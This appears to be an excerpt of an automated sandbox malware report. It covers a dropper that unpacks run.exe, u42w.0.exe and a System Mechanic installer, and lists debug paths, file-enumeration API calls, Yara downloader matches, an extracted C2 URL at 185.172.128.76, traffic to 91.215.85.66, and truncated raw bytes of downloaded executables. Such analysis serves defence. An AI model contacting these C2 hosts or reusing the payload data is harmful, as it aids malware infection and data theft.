Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942647828.00000173F45F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1806205477.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806418493.000000000432D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806060081.0000000003B1A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054438772.0000000005560000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2053660650.000000000507F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047243980.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047475652.0000000004339000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2046349447.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204376532.0000000005071000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204654106.0000000005550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: mozglue.pdb source: u42w.0.exe, 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000000.1746274601.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1804456398.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000000.1987893127.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000002.2045446560.000000000083C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959598733.00000173F5380000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938719141.00000173F2420000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1807890245.000000006C967000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000F.00000002.2048249667.000000006C1F7000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942501439.00000173F45E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938776156.00000173F2430000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: FCBAECGIEB.exe, 00000016.00000002.2883604441.0000000000B1C000.00000002.00000001.01000000.00000018.sdmp, FCBAECGIEB.exe, 00000016.00000000.2059092931.0000000000B1C000.00000002.00000001.01000000.00000018.sdmp, tiktok[1].exe.1.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942377464.00000173F45D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938776156.00000173F2430000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942377464.00000173F45D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1806205477.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806418493.000000000432D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1806060081.0000000003B1A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054438772.0000000005560000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2053660650.000000000507F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047243980.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047475652.0000000004339000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2046349447.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204376532.0000000005071000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204654106.0000000005550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959660867.00000173F5390000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2928112460.000001739001C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: nss3.pdb source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_0040B610 GetDateFormatA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_6C86261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	2_2_6C86261E

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File opened: C:\Users\user\AppData\Local\Temp\u42w.2	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File opened: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.172.128.76/3cd2b41cbde8fc9c.php
Source: Malware configuration extractor	URLs: http://185.172.128.76/3cd2b41cbde8fc9c.php

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.215.85.66 ports 1,4,5,6,7,15647

Yara detected Generic Downloader

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4860000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.4:49756 -> 91.215.85.66:15647

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Apr 2024 07:03:57 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 25 Apr 2024 07:00:02 GMTETag: "44200-616e6560d4ed7"Accept-Ranges: bytesContent-Length: 279040Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 8e a8 0b d1 ef c6 58 d1 ef c6 58 d1 ef c6 58 cf bd 53 58 c0 ef c6 58 cf bd 45 58 b2 ef c6 58 cf bd 42 58 fb ef c6 58 f6 29 bd 58 d4 ef c6 58 d1 ef c7 58 bb ef c6 58 cf bd 4c 58 d0 ef c6 58 cf bd 52 58 d0 ef c6 58 cf bd 57 58 d0 ef c6 58 52 69 63 68 d1 ef c6 58 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a1 22 4f 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a8 00 00 00 16 82 02 00 00 00 00 4c 16 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 82 02 00 04 00 00 b1 d4 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 42 03 00 3c 00 00 00 00 80 81 02 68 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b3 a6 00 00 00 10 00 00 00 a8 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 dc 8a 02 00 00 c0 00 00 00 8c 02 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 22 7e 02 00 50 03 00 00 28 00 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 e0 00 00 00 80 81 02 00 e2 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:03 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 